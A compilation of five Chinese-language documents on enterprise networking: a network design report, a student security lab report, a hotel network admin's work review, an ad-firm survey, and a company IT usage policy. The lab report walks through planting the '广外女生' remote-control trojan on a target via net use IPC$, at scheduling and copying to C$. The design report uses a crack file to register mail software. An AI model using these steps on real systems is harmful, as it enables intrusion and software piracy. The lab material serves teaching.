第一篇:企业网络设计报告
网络构建设计报告
用接入交换机可以把多个计算机设备连接在一起,组成一个网络。由于企业比较大型,所以应分成3个区,每个区分别使用一台总的交换机。
企业网络构建要求:(1)所有用户接入互联网,仓库人员一律不得上外网;(2)需要一个网站;(3)需要一个文件共享;(4)需要自己建立邮件服务;(5)销售部网络应用需要重点保障;(6)网络中心拥有网络监视权、控制权;(7)适当的布局无线网线;(8)不同大楼之间用光钎连接.内部网络:小型办公网络可以使用10/100M的交换以太网来组建内部网络,在这里我们需要的设备包括网络适配器和交换机这两种设备。网络适配器就是一般的网卡,交换机设备则需要根据网络中的终端数量来进行选择,目前市场上适合小型办公网络使用的交换机有5口、8口、16口和24口几种,在选择的过程我们需要根据网络中终端数量的多少来选择,而且在选择时还应注意要有冗余和日后网络升级的考虑。
外部网络:一般我们可以用以下几种方式来共享一条宽带线路上网:(1)代理服务器方式共享上网,这种方式不需要其他的投资,但需要提供一台主机用作代理上网使用,这台机器需要配备两块网卡,不需要如宽带路由器等共享上网设备。缺点是如果这台机器出现故障或关机时,所有的机器都会受到影响而不能正常上网。(2)宽带路由器方式共享上网,这种方式需要投资购买宽带路由器,优点是不需要过多的维护,只要打开宽带路由器就可以随时提供共享上网服务,缺点是宽带路由器有可能会因为性能、病毒等种种因素造成使用网络的不正常。
宽带接入仍然是企业接入方式的热门选择,但这就不仅仅是一条线光纤或者两条ADSL引入这么简单,因为一两条宽带难以满足企业的带宽需要,对于一般规模的企业来说,选择双光纤接入,或者是多条ADSL接入应该可以满足客户的使用需求。公司所有用户接入互联网,仓库人员一律不得上外网。公司目前从ISP获取了两个合法IP,码头:由于码头人数只有15人,所以使用一台16个端口的交换机就足够了,其中一个端口连接企业大楼的网络中心的总的交换机。
厂房:由于厂房有80人之多,所以需要2台32个端口的交换机、1台24个端口的交换机以及一台总交换机,其中总交换机向上连接整个网络的交换机,向下连接另三台交换机,其中一台32口交换机连接原料仓库的10台以及成品仓库的20台电脑,另一台32口的交换机连接成产管理部的30台电脑,最后一台24口的交换机连接半成品仓库的20台电脑。企业大楼:企业大楼人数众多,有138人,所以需要用许多的交换机。网络中心拥有控制权,所以直接连接总的交换机。总的交换机为8个端口的交换机,往下再连接一个8个端口的交换机。这个交换机连接之一是一个8个端口的交换机,下面连接经理部8人的电脑;之二是连接一个8个端口的交换机,下面连接财务部5人的电脑;之三是连接一个24个端口的交换机,下面连接跟单部20人的电脑;之四是连接一个48个端口的交换机和一台无线AP,下面连接管理部50人的电脑;之五是连接一个48个端口的交换机和一台无线AP,下面连接销售部50人的电脑。整个网络最中心的交换机上连接路由器以及防火墙,之后可以与外网连接。
一、所有用户接入互联网,仓库人员一律不得上外网
因此必须要设置一下路由器,具体步骤如下:
登陆宽带路由器,打开IE,输入192.168.1.1,就会出现登陆窗口。输入账号,密码登入
1.设置页面--安全设置--防火墙设置--选择开启防火墙,开启MAC地址过滤二项--"禁止已设MAC地址列表中已启用的MAC地址访问Internet 2.设置页面--安全设置--MAC地址过滤--添加新条目--把禁止上网的电脑的MAC地址填进去,并选择使该条目生效.上网控制设置后,被禁止上网的电脑就不可以上网了,但局域网内部之间可以正常访问。
二、需要一个网站
1.确定网站主题,网站主题就是你建立的网站所要包含的主要内容,一个网站必须要有一个明确的主题。企业网站的主题就是企业的历史、企业的产品或服务内容等与企业相关的东西。
2.搜集材料,明确了网站的主题以后,你就要围绕主题开始搜集材料了。
3.规划网站,网站规划包含的内容很多,如网站的结构、栏目的设置、网站的风格、颜色搭配、版面布局、文字图片的运用等。
4.选择合适的制作工具,网页制作涉及的工具比较多,首先就是网页制作工具了,目前大多数网民选用的都是所见即所得的编辑工具,具体有Dreamweaver、Frontpage、Frontpage2000。除此之外,还有图片编辑工具,如Photoshop、Photoimpact等;动画制作工具,如Flash、Cool 3d、Gif Animator等;还有网页特效工具,如有声有色等。5.制作网页,材料、工具都准备好了,下面就需要制作网页了,在制作网页时,先把大的结构设计好,然后再逐步完善小的结构设计而且要先设计出简单的内容,然后再设计复杂的内容,以便出现问题时好修改。
6.上传测试,网页制作完毕,最后要发布到Web服务器上,利用FTP工具把网站发布到自己申请的主页存放服务器上。网站上传以后,要在浏览器中打开自己的网站,逐页逐个链接的进行测试,发现问题,及时修改,然后再上传测试。
7.推广宣传,网页做好之后,还要不断地进行宣传,推广的方法有很多,例如到搜索引擎上注册、与别的网站交换链接、加入广告链等。8.维护更新,网站要注意经常维护更新内容,保持内容的新鲜。
三、需要一个文件共享
文件共享设置:在某台电脑上,打开“我的电脑”使用鼠标右键单击磁盘区分或文件夹后,会出现一个“共享和安全”菜单,单击该功能后,会出现“共享”选项卡.将“在网络上共享这个文件夹”选项勾选后,然后系统会让用户填写共享名字,并设置权限.文件夹被共享之后,会出现一个手托着的文件夹的图标,之后在另外的计算机的“运行”对话框中输入该机的地址或计算机名字,就可以访问到共享文件夹了.四、需要自己建立邮件服务
1.企业需要申请合法的邮件域名。2.需要有合法的固定IP地址 3.先在系统安装IIS
4.安装正式版
5.更改安装目录例D:/WINWEBMAIL权限;Everyone写入/读取/修改/读取和运行;D:/盘权限Everyone读取/读取和运行,如果安装在E盘就给E盘
6.将破解文件复制到D:/WINWEBMAIL 运行破解文件启动winwebmail 7.右键点右下角的邮局图标--注册--选无限用户--复制前面的注册信息粘贴进输入筐,点注册
8.复制弹出筐中的认证码
9.右键点右下角的邮局图标--停止邮局服务--退出邮局
10.启动邮局---右键点右下角的邮局图标--注册--输入刚才复制的认证码--注册 11.打开IIS--新建站点--D:/WINWEBMAIL/web 12.输入你绑定的域名,用admin密码admin登陆并做相关设置
五、销售部网络应用需要重点保障
在企业大楼的总交换机与销售部的交换机中间安装防火墙,而且在交换机与无线路由器之间安装防火墙。
六、网络中心拥有网络监视权、控制权
网络中心拥有控制权,所以直接连接总的交换机。
七、适当的布局无线网线
1.在管理部的交换机上链接无线路由器 2.在销售部的交换机上链接无线路由器 3.在企业大楼安装无线天线
八、不同大楼之间用光钎连接
如上图所示,不同大楼之间用光钎连接。心得体会:
通过本次计算机网络课程设计,我更加充分的理解了课本上的知识,并能够加以扩展,从而应用于实践当中,要实现一个小型办公网络,画出网络简单模块拓补图,对其内部器件进行相应的正确配置。达到网络畅通、功能齐全、安全可靠的目的,并符合公司对网络的要求水平。
通过本网络的设计,我基本掌握了路由器、交换机、网络适配器以及SMTP服务器、DNS服务器、FTP/HTTP服务器的用途及配置维护方法,了解了防火墙对网络的重要性,从而对我的网络知识有了更深一步的加深与延拓,是今后学习和工作中的一次宝贵经验。
第二篇:【企业网络】网络信息安全报告
XX中型企业网安全 网络信息安全报告
一、实验目的及要求
该专周的目标是让学生掌握网络安全的基本框架,网络安全的基本理论。以及了解计算机网络安全方面的管理、配置和维护。
本课程要求在理论教学上以必需够用为原则,应尽量避免过深过繁的理论探讨,重在理解网络安全的基本框架,网络安全的基本理论。掌握数据加密、防火墙技术、入侵检测技术以及学习网络病毒防治。了解Windows 2000的安全、Web的安全、网络安全工程以及黑客常用的系统攻击方法。本课程要求学生对计算机的使用有一定了解(了解Windows的使用,具有键盘操作和文件处理的基础),并已经掌握计算机网络的基本原理。
二、专周内容
1、安全需求分析
(1)网络安全问题主要集中在对服务器的安全保护、防黑客和病毒、重要网段的保护及管理安全上。因此,我们必须采取相应的安全措施杜绝安全隐患,其中应该做到:
A、公开服务器的安全保护 B、防止黑客从外部攻击 C、入侵检测与监控 D、病毒防护 E、数据安全保护 F、网络的安全管理
(2)解决网络安全问题的一些要求
A、大幅度地提高系统的安全性(重点是可用性和可控性);
B、保持网络原有的特点,即对网络的协议和传输具有良好的透明性,能透明接入,无需更改网络设置;
C、易于操作、维护,并便于自动化管理,而不增加或少增加附加操作;
D、尽量不影响原网络拓扑结构,同时便于系统及系统功能的扩展;
E、安全保密系统具有较好的性能价格比。一次性投资,可以长期使用;
F、安全产品具有合法性,及经过国家有关管理部门的认可或认证;
(3)系统安全目标
A、建立一套完整可行的网络安全与网络管理策略;
B、将内部网络、公开服务器网络和外网进行有效隔离,避免与外部网络直接通信;
C、建立网站各主机和服务器的安全保护措施,保证他们的系统安全;
D、加强合法用户的访问认证,同时将用户的访问权限控制在最低限度;
E、全面监视对公开服务器的访问,及时发现和拒绝不安全的操作和黑客攻击行为;
F、加强对各种访问的审计工作,详细记录对网络、公开服务器的访问行为,形成完整的系统日志;
2、网络拓扑
3、网络安全的基本内容
(1)基本网络命令
A、ping命令: ping –t IP,向指定的计算机不停的发送数据包,按Ctr+Break快捷键可以查看统计信息并继续运行,按 Ctr+C可中止运行。
B、Tracert命令:tracert IP 显示从本地计算机到目标服务器所经过的计算机:
C、pathping pop.pcpop.com 除了显示路由外,还提供325S的分析,计算丢失包的%
(2)操作系统安全
A、屏蔽不需要的服务组件
开始——程序——管理工具——服务 出现以下窗口:
然后在该对话框中选中需要屏蔽的程序,并单击右键,然后选择“停止”命令,同时将“启动类型”设置为“手动”或“已禁用”,这样就可以对指定的服务组进行屏蔽了。B、关闭默认共享:“开始”——“程序”——“管理工具”——“服务”——“Server”
(3)数据库系统安全
A、使用安全的帐号策略和Windows认证模式
由于SQL Server不能更改sa用户名称,也不能删除这个超级用户,所以,我们必须对这个帐号进行最强的保护,当然,包括使用一个非常强壮的密码,最好不要在数据库应用中使用sa帐号,只有当没有其它方法登录到 SQL Server 实例(例如,当其它系统管理员不可用或忘记了密码)时才使用 sa。可以新建立一个拥有与sa一样权限的超级用户来管理数据库。安全的帐号策略还包括不要让管理员权限的帐号泛滥。
SQL Server的认证模式有Windows身份认证和混合身份认证两种。在任何可能的时候,应该对指向SQL Server的连接要求Windows身份验证模式。
Windows认证模式比混合模式更优越,原因在以下:
1)它通过限制对Microsoft Windows用户和域用户帐户的连接,保护SQL Server免受大部分Internet工具的侵害。
2)服务器将从Windows安全增强机制中获益,例如更强的身份验证协议以及强制的密码复杂性和过期时间。
3)使用Windows认证,不需要将密码存放在连接字符串中。存储密码是使用标准SQL Server登录的应用程序的主要漏洞之一。
4)Windows认证意味着你只需要将密码存放在一个地方。
要在SQL Server的Enterprise Manager安装Windows身份验证模式,步骤操作: 展开服务器组——右键点击服务器——然后点击“属性”——在安全性选项卡的身份验证中——点击“仅限Windows”。(4)网络防火墙工具:红墙主机网络防火墙 安装
1.具体操作如下:
第一步: 将“爱思红墙主机网络防火墙”的安装光盘插入驱动器,运行根目录下的Setup文件来运行其安装程序,进入“爱思红墙主机网络防火墙安装”窗口;
第二步:
在“欢迎安装爱思红墙主机网络防火墙”对话框中,单击“下一步”按钮;
第三步: 在“软件许可协议”对话框,接受协议点击“是”;
第四步: 点击“是”按钮,出现显示您计算机的相关信息,即判断是否可以安装本软件;
第五步: 单击“下一步”按钮,出现“选择目标位置”对话框;
第六步: 在该对话框中,单击“浏览”按钮,并在“选择文件夹”对话框中选择盘符作为驱动器,再指定相应的文件夹及路径,然后单击“确定”按钮;
第七步: 单击“下一步”按钮,出现“选择安装程序名称”对话框,您可自定义程序名称;
第八步: 单击“下一步”按钮,系统开始复制文件;
第九步: 进入“红墙主机网络防火墙配置”窗口,作出是否运行“红墙应用程序扫描系统”的选择后,点击“完成”。
相关设置:告警设置:系统提供了两种情况下的告警,即需要系统告警和不需要系统告警,您可据需要选取告警设置。
点击主界面中的“规则管理”按钮,弹出相应窗口,如下图:
网络监控中心:
(5)网络攻击工具:“广外女生”
它的基本功能有:文件管理方面有上传,下载,删除,改名,设置属性,建立文件夹和运行指定文件等功能;注册表操作方面:全面模拟WINDOWS的注册表编辑器,让远程注册表编辑工作有如在本机上操作一样方便;屏幕控制方面:可以自定义图片的质量来减少传输的时间,在局域网或高网速的地方还可以全屏操作对方的鼠标及键盘,就像操纵自己的计算机一样;远程任务管理方面,可以直观地浏览对方窗体,随意杀掉对方窗体或其中的控件;其他功能还有邮件IP通知等。
主要步骤:首先运行“gwg.exe”,出现如图窗口:
选中“服务端设置”,生成“GDUFS.exe”木马:
然后将“GDUFS.exe”复制到自己的C盘中,再根据一些命令把“GDUFS.exe”复制到目标主机的盘中,再进行运行。目标主机的IP:191.168.12.38 具体步骤及命令:
“开始”——“运行”——“cmd”
命令:net use 191.168.12.38ipc$ 123 /user:administrator 与目标主机之间建立联系
命令:net time 191.168.12.38 获取目标主机的时间
命令:at 191.168.12.38 08:21 net share c$=c: 与目标主机的C盘建立通道
命令:copy c:GDUFS.exe 191.168.12.38c$ 复制“GDUFS.exe”文件到目标主机的C盘中:
命令:191.168.12.38 10:49 c:GDUFS.exe 指定“GDUFS.exe”在目标主机中什么时候运行。
三、专周小结:
通过这次网络安全专周,我不仅仅是学到了很多知识,更是透彻的理解到了网络安全对生活已经将来工作的意义。
网络安全分为软件网络安全和硬件网络安全。一般我们说的网络安全就是软件上的网络安全,即局域网,互联网安全。
网络安全又分为内网安全和外网安全。在内外网安全中,内网安全则是重中之重。毕竟是家贼难防。据不完全统计,全国因为内网安全的问题,至少每年算是几亿美元。所以,网络安全特别重要。
至于在将来的工作中,我们也要严格尊市网络设备管理原则和使用秩序,对设备进行统一管理专人负责,严格要求自己对设备进行安全操作,保持强烈的责任感和服务意识,做好每一个细节,重点做好以下几项工作:
1,及时准确判断网络故障,做好上门维护工作或及时提醒网络合作商进行维护。
2,定期检查维护各网络设备的运行情况并进行维护。3,不定期对服务器进行更新和检查。
4,遇到特殊情况,及时向领导和老师汇报,努力提高应急处理问题和独立处理问题的能力。
感谢老师对我们的教导。
第三篇:企业网络网络网管述职报告
天台大酒店工程部
XX您好!
2007年10月入职本 工程部,主要负责网络、音响、监控的管理及酒店内部宣传物品、图像视频资料拍摄收集、标识制作等工作,09年上半年,因工作需要,由工程部网管调职到总经办协助办公室工作,后又调入行政事务部工作,任行政事务部主管。在上级领导的关怀、细心指导及各位同事的热心帮助下,克服业务性质不熟悉等客观因素,较快的进入了工作岗位。任职期间主要负责酒店行政后勤宿舍楼、员工餐工作,同时协助其他部门正常开展日常工作。现将思想工作及长期主要工作情况、存在的问题、工作打算作如下述职;
一、思想工作:
1、两年来,在总经理的指导、经理班子带领下,严格要求自己,从我做起,树立为各部门服务的好思想,扎实做好各项工作。
2、认真执行各项规章制度,做好表率,为自己开展工作打下良好基础。
3、采取各种形式,加强专业技能的提升:通过对书本的学习及对
网络的应用,不断充实和扩大自己的知识面,学习有关行政
办公等方面的知识,同时进一步增强了自己的责任感和使命
感,使自己在日常的工作中目标更加明确。
二、主要工作情况:
1、行政事务部是一个特殊的部门,主要在各部门间起承上启
下、沟通内外、协调左右的作用,从而推动各项工作朝着既
定目标前进。任职期间主抓了以下工作:
a)加强宿舍管理,在落实原有《员工宿舍管理规定》定时巡查
宿舍之外、同时同步了解员工思想生活状况,做好水、电、暖、空调等报修工作为员工提供一个安全、舒适、温馨的住
宿环境,把工作思路变被动为主动。
b)加强了员工餐卫生管理、员工就餐时间及员工节约意识培养的管理,深入强化一线为顾客服务、后勤为一线服务的意识。
2、网络、音响方面主做了以下工作:
a)07年10月对客房4-6楼的房间网线进行检查故障排查。
b)07年底组建了酒店内部局域网,架设了文件服务器,收集企
业信息进行归类整理。
c)08年2月份为客房部、餐饮部配备《人和餐饮管理软件》,使客房、餐饮实现了电脑化操作。
d)08年下半年为酒店架设了软路由,使原来客房手动填写上网
地址变为自动填写。
e)09年下半年为酒店宴会大厅更换了一套新的音响设备。同时
为鸭王府、1号会议室、2号会议室添置补充了部分音响设备,同时制定了使用管理办法。
三、工作中的不足之处:
⒈在日常工作中,思想认识不到位,对自己放松要求。
⒉个人文化修养有待提高,在公文写作及文字使用方面还需进一步加强。
⒊在今后的工作中,管理的方式方法还需提升。
四、工作打算
作为后勤部门,要不断转变工作方式、提高工作效率、加强服务意识,以适应酒店新形势、新发展的需要。因此今后的工作方向如下:
⒈利用工作闲暇时间积极学习与本职工作相关的各种知识,不断加强行业知识的学习,在拟写公文等方面下功夫,提高文字写作能力,同时不断深化网络相关知识,与时俱进。
2.利用网络建立企业网站,对外宣传企业形象,扩大企业知名度。
3.加强酒店内部网络建设、规划,使其稳定、高效为企业快速发展服务。
述职人:黄双健 以上述职敬请经理班子和各位同仁审议。
第四篇:设计企业调研报告
设计企业调研报告
——联合智尚广告设计公司
经营状况:
联合智尚是一家拥有专业实力派设计师、专业摄影师的盐城广告设计公司,服务于盐城及周边区域,在盐城地区已有上百成功案例,一直深受客户赞誉。专业的设计能力,严谨的工作态度,完善的客服服务是他们一贯保持的客户宗旨。在盐城广告设计的领域,他们是最专业最创意的。
联合智尚品牌设计是一个充满活力、创造力的专业团队,以“做适合客户的设计公司”为宗旨。拥有一个稳定、沟通而智慧的设计服务团队,致力于构建一个兼具国际视野、本土根基与专业品质的盐城广告设计公司,为盐城客户营造品牌价值,亦一起营造成就感的精英团队。
联合智尚80%的生意是由客户介绍而来,这更加能证明口碑的力量,这也是此公司将客户服务看的非常重要的原因。他们认为维护好一个客户所产生的效益是比新开发客户更巨大更有意义。在盐城广告公司中,联合智尚是第一家设置客服专线、第一家提出1+2服务理念的广告设计公司。客户的每一个要求都会在第一时间响应并得到解决。这亦使得越来越多的企业选择他们。而对于客户来说,专业优质的服务就意味着企业能得到更高水平的服务,专业的设计能力更能体现出企业存在的价值和企业理念。
业务范围:
标志设计:
企业标志设计 网站标志设计 商标设计 个人LOGO设计
画册设计:
企业画册设计 样本设计 书籍封面设计 企业年报设计 折页设计 封套设计 包装设计:
食品包装设计 药品包装设计 保健品包装设计 化妆品包装设计 酒类包装设计 日用品包装设计
茶叶包装设计 软件包装设计 服装包装设计 手提袋包装设计 数码产品包装设计 饮料包装设计
企业VI设计:
VI设计 店面形象设计 环境导视系统设计 办公环境设计 专卖店设计 广告设计:
海报设计 POP宣传设计 DM设计 杂志广告设计 报纸广告设计 企业发展规划:
中国广告市场持续增长
广告行业是否蓬勃与一个市场经济的发展息息相关,以美国为例,从1986-2007年期间,每年的广告量增长与GDP的增长有81%的相关度。那就是说,一个市场的经济增长与广告投资的量非常密切。
2011年,除了各种数据,在去年底为各大客户做今年广告预算的时候和观察各主要媒体刊例价的升幅程度,都能对今年的经济状况有一些感觉。而且,不
同行业品类的广告投资预算都有不一样,也能够对那些行业看好市场的举动可见一斑。纵使2011年没有大事件(如世博、奥运、世界杯),实力传播预估2011年的广告量升幅为13%(2010年的为14.5%),整个经济状况仍然非常向好。广告量增长三大原因
广告量的持续增长主要为三大原因。
一、新品牌新产品的出现,例如汽车行业新的车款的出现;
二、释放市场的需要,例如越来越多的零售业打进三四线市场,开店发展;
三、主要媒体刊例价的持续增幅,从去年底中央电视台的广告投标所产生的热烈市场需求,和一些新媒体的备受重视,如优酷(视频类)和微博(社交化媒体)等。从行业上观察到广告投入方面,致使日化品为最大广告量的行业,这意味着市场上消费者的需求所在。
新媒体成为主流媒体
基于在广告业的变化,首推新媒体(特别是互联网)几乎已成为主流的媒体,主要是从以下几方面。首先,广告客户接触新媒体的程度已经趋到一个阶段,他们会发问一些问题:为何这个活动你们没有把互联网放进去?另外一个问题,我们今年对手有什么搜索的活动?另外一个问题,我们是否要用微博?等等,这是由于新媒体普及的速度远超数年前,而且很多广告客户个人也已在用这些新媒体。
其次,移动营销会真正的起飞。随着智能手机的增加增多和普及,移动营销会有很不一样而且大幅度的增长。APP的营销运用也会是个新的尝试。通过手机上网,互动会真的越来越普遍。
新媒体的数据监测跟衡量也会变得越来越重要,如何整合传统媒体的数据一起分析运用也成为很重要的广告营销话题。现在新媒体多,在传统媒体方面也有一个质量的变化,一直备受压力的纸媒将要面临一个选择,一个对平台的选择,更多的iPad类平台出现,内容也在丰富起来,用户也越来越多,这个情形在中国也越来越普遍。由于这些变化,广告模式也在改变,互动类的广告将会越来越多。
公司战略调整
由于以上的改变,联合智尚也要同步调整:
一、招揽跟培育新技术人才,主要在互联网不同平台的专家(如搜索、电子商务等)和内容提供的高手(如产品植入新的模式)。这需要很快的速度去完成这个转型。
二、广告公司的收费模式也要变得更配合投资回报式的效果衡量。因此要加强调研的能力跟数据分析的技巧。这些老技术的加强版。
三、一切营销的源头都来自对消费者(就是受众)的洞察,因此广告公司要加强对各种技术平台的技术认知与对内容创新的能力,要以超越常规广告的态度去迎接新营销时代。
第五篇:企业网络管理制度
XX科技有限公司
★
综字2009第(005)号
XX科技计算机及网络设备管理制度(修订)
第一章 总则
第一条 为正确使用计算机及网络产品,及时发现设备故障,延长设备使用寿命,保护公司财产,加强对公司计算机网络的安全保护,维护计算机网络的正常运作特制定本制度。
第二条 本制度所涉及产品的界定:
A. 计算机是指为公司内部员工使用的PC机(包括CPU、硬盘、内存、机箱、显示器、网卡、键盘和鼠标。主机板和显示卡由本公司提供,如非特殊需要不配备光驱和软驱。)
B. 网络设备是指公司内部使用的服务器、网络交换机、路由器、集线器、以及网络接入设备等。
C. 计算机其他配件是指公司备用的光驱、软驱等。
D. 附带软件包括计算机驱动盘、系统安装盘、程序安装盘等。
第二章 公司计算机环境
第三条 计算机及网络产品使用 A.公司所有计算机及其内部配件和网络产品均由网管人员粘贴公司标签,除已借用的笔记本电脑外,一律不得拿出公司。
B.如工作需要需将公司计算机等拿出公司,员工须到行政部门说明情况,由行政内勤开具出门证明,并报信息管理部备案。
C.电脑或网络出现故障后不得私自打开机箱进行拆卸,统一由专业计算机维护人员进行检修。公司员工不得随意打开计算机机箱。如因工作需要打开机箱者,应有直接上级同意并通知信息管理部,由网管人员打开机箱;机器整理完毕,信息管理员为其重新粘贴公司标签。
D.计算机在使用过程中未经他人许可严禁随意拷贝、修改及删除他人计算机的资源。
E.公司每位员工对自己的工作电脑既有使用的权利又有保护的义务。任何的硬件损坏必须给出损坏报告,说明损坏原因,不得擅自更换。公司会视实际情况进行处理。
F.软件维修人员不保证一定能够解决由于员工自己安装的软件所引起的问题,除非能够在标准平台上重复所出现的问题。
第四条 计算机及网络产品的维修
A.公司员工发现所使用得计算机或网络产品出现硬件故障后应及时向综合管理部提出维修申请。
B.网络管理员在接到申请后,须在一个小时内做出响应。
C.如果员工的计算机在提出申请后一个工作日内仍不能修好,网管人员须暂调其他备用机器以保证该员工工作的正常进行。
D.在维修处理过程中,网管人员应查阅该机器的采购和维修纪录,确认出现故障的硬件是否在维修期内以享受免费维修。E.如果配件已无法维修,网管人员应调配其他备用配件或按照采购制度购买新配件进行更换,更换后对领用清单进行相应修改。
F.服务运营中心提供对工作电脑的软硬件技术支持服务,包括诊断,故障排除和维修。
第五条 损坏责任的承担
A.自然损坏:凡属于计算机原有的质量问题、超过使用年限等等非人为因素造成的损坏;
B.个人原因损坏:凡属于人为因素,例如摔打、撞击等等造成的损坏。
C.凡属自然损坏的,维修费用由公司承担;属个人原因损坏的,维修费用由个人承担。
D.机型过于陈旧无维修价值时,由信息管理部经理申请整机核销,经总经理助理批准后报财务备案,并将该机其他有用部件作为维修配件。
E.如工作人员不按规定操作,造成不良后果的,将按有关规定,由操作者承担相应责任,并追究部门负责人的有关责任。
第六条 公共打印机的管理
A.公共打印使得所有员工更便于访问集中控制的打印资源。
B.在公司内部由专人负责管理公共打印机环境。公司公共打印机资源为:前台黑白打印机所有人可以访问,除必须打印和与工作相关的资料外,不得打印其他无关内容;核心彩色打印机为公司商务部门投标专用打印设备,除公司指定专人可以使用此打印机打印资料外,其他任何人未经管理部许可不得使用此打印机或借用别人电脑使用此打印机打印任何形式的内容。
第三章 信息安全控制
第七条 安全管理 A、未经网管批准,任何人不得改变网络拓扑结构,网络设备布置,服务器、路由器配置和网络参数。
B、任何人不得进入未经许可的计算机系统更改系统信息和用户数据。
C、公司局域网上任何人不得利用计算机技术侵占用户合法利益,不得制作、复制和传播妨害公司稳定的有关信息。
D、各部门定期对本部门计算机系统和相关业务数据进行备份以防发生故障时进行恢复。
E.公司购买新的软件产品或自己开发的软件产品,安装使用前一定要生产厂家的专家技术人员来厂进行培训,只有经过培训合格者,方能取得此软件的操作权限。
F.必须严格按照操作规程工作,做好个人机器内重要数据的备份。计算机原则上由专人负责操作维护,不得串用设备。下班后必须按程序关闭主机和其他设备,切断电源。
G.工作人员必须自觉遵守有关保密制度,保密文件资料不得提供共享。各操作人员应防止操作口令对外泄密。不得把重要的软件或光盘随意外借,不得为外单位人员拷贝公司机密软件。未经公司领导同意,外来人员不得随意进入机房和使用本单位的电脑及网络设备。
H.非中心人员,谢绝进入机房。有特殊需要的,须经机房管理员或负责人同意后,方可进入。
I.中心各电脑终端IP地址由网络管理员统一规划、设置。若需改变的,都必须向网络管理员提出申请,严禁私自改动。
第八条 病毒的防治管理
A、任何人不得在公司的局域网上制造传播任何计算机病毒,不得故意引入病毒。
B、使用者发现病毒应立即向网络管理员报告以便获得及时处理。
C、网络服务器的病毒防治由网络管理员负责。D、各部门应定期对各自使用的计算机杀毒(周期为一周)如发现计算机有病毒时,应及时清除,清除不了的病毒,要及时上报。管理员应及时升级病毒库,并提示各部门对杀毒软件进行在线升级。
第九条 信息安全
A.员工应对在自己公司电脑内公司机密信息的安全负责,当需暂时离开座位时必须立即启动屏幕保护程序并带有密码。
B.员工有责任正确地保护分配给本人的所有计算机帐户。
C.每台公司电脑内必须安装反病毒软件并启动实时扫描程序。服务运营中心可以提供最新的杀毒软件及最新数据更新文件。
D.不得安装有可能危及公司计算机网络的任何软件,如实有需要进行软件测试的必须将计算机脱离公司计算机网络进行单机操作。任何人不得在未经管理部门许可的情况下,利用公司网络进行测试。
E.任何对公司内部计算机网络的黑客行为是绝对禁止的,一经查实将按公司有关规定严肃处理。
F.公司提供的互联网访问服务只能被使用在与公司业务有关的方面,否则一经查实将按公司有关规定严肃处理。公司提供的互联网访问服务只在每个工作日的早上8:30至晚上5:30有效。
第十条 聊天上网
A.工作期间员工不得使用QQ、MSN、POPO聊天等工具(只限于与客户、供应商沟通工作)。一经查实将按公司有关规定严肃处理。
B.工作时间内严禁工作人员在计算机上进行与工作无关的操作,不准聊天、玩游戏,或看影视、听音乐、看股票行情及其它与工作无关活动。不得使用来路不明或未经杀毒的盘片。一经查实将按公司有关规定严肃处理。C.工作期间避免使用占用大量带宽的下载工具下载软件如迅雷,快车,BT等,由于公司带宽有限,确实因工作需要下载软件的,请自觉限制带宽或利用休息时间进行下载。
D.公司将不定期抽查计算机上网记录和聊天记录,如发现违反本制度的,视情节轻重给予通报批评、纪律处分。构成犯罪的,由司法机关依法追究刑事责任。
第十一条 网站及BBS管理
任何人员不得利用本公司网站泄露秘密,不得侵犯国家、社会、集体利益和其他公民的合法权益,不得利用网站及BBS制作、复制和传播下列信息:网络管理员必须检查链接网站、个人主页的信息内容,若发现其包含有害信息的应及时取消其链接。网络管理员必须定期检查网站内容及BBS论坛发表内容,若发现其包含有害信息的必须及时删除和取消其用户资格,有违反法律法规的应及时交予公安部门查处。
(一)煽动抗拒、破坏宪法和法律、行政法规实施的;
(二)煽动颠覆国家政权、推翻社会主义制度的;
(三)煽动分裂国家、破坏国家统一的;
(四)煽动民族仇恨、民族歧视,破坏民族团结的;
(五)捏造或者歪曲事实,散布谣言,扰乱社会秩序的;
(六)宣扬封建迷信、淫秽、色情、赌博、暴力、凶杀、恐怖、教唆犯罪的;
(七)公然侮辱他人或者捏造事实诽谤他人的,或者进行其他恶意攻击的;
(八)损害国家机关信誉的;
(九)其他违反宪法和法律行政法规的;
(十)进行商业广告行为的。第十二条 帐户密码管理
每个员工拥有一个公司内部域成员帐户,一个电子邮件帐户。新员工申请以上帐户时需要向网络管理员提供中英文姓名,部门,职位等信息,网络管理员将在一天内将帐户信息通知其本人。
(一)说明
所有员工只需设置域帐户的密码,因为电子邮件帐户是通过域帐户认证的;除此之外所有员工必须在所使用的计算机中设置开机密码和屏幕保护密码。
(二)设定
一些新且复杂的计算机密码破解工具已经出现,这将会对公司产生一系列危险。为了保护公司的信息资产,对于密码新的更复杂的要求正在产生。这会使我们的帐户更难以被破解。
(三)更改
A.建议每90天更改一次密码。
B.不要使用已用过的旧密码。
C.同时更改你所有的密码。
D.如果愿意,你可以为所有系统设置相同的密码,但此密码必须十分可靠。
(四)注意
A.密码中大小写字母意义不同,例如”pass#%word”不同于”Pass#%WoRd”。
B.不要把密码写下来。
C.不要把密码告诉任何人。
第十三条 电子邮件管理
(一)说明
公司提供的电子邮件只是用于与公司业务有关的方面。禁止传播任何不合适的笑话,幸运链信件或攻击性言论,否则公司将给予纪律处分。发送与公司业务无关的内容也是一种错误使用公司资源的行为。
(二)规定
A.每个电子邮件信箱不得超过200M。
B.单封电子邮件不得超过10MB。
C.请所有员工自觉备份自己邮箱的邮件,每天及时收电子邮件,网络管理员会不定期的按照以下规则清理信箱系统,以保证公司电子邮件系统不会过载。
D.删除超过三个月的邮件。
F.删除容量接近临界空间的邮件。
电子邮件,附件和其它文件夹项目应该服从存档的要求和规定,即它们只能保留到与内容有关的公司业务结束的时候。为了帮助满足这些要求以及增强对公司计算机消息系统的支持,员工必须定时将信箱各部分按以下规则存档:
A.发件箱 30天
B.收件箱 30天
C.已发邮件 30天
D.草稿 15天
E.垃圾邮件 15天
F.已删除邮件 15天 严格遵循这些存档规则可以改善公司电子邮件系统的稳定性,并且减少对于系统维护的开销。
个人文件夹是存放在个人计算机的本地硬盘上的,所以不需存档。
第四章 附则
第十四条 任何使用本公司计算机网络的人员必须遵循此制度。
第十五条 本公司计算机网络管理员:
第十六条 网络管理员的职责
A、制定网络建设及网络发展规划,确定网络安全及资源共享策略。
B、负责公用网络实体,如服务器、交换机、集线器、防火墙、网关、配线架、网线、接插件等的维护和管理。
C、负责服务器和系统软件的安装、维护、调整及更新。
D、负责网络账号、邮件管理、资源分配、数据安全和系统安全。
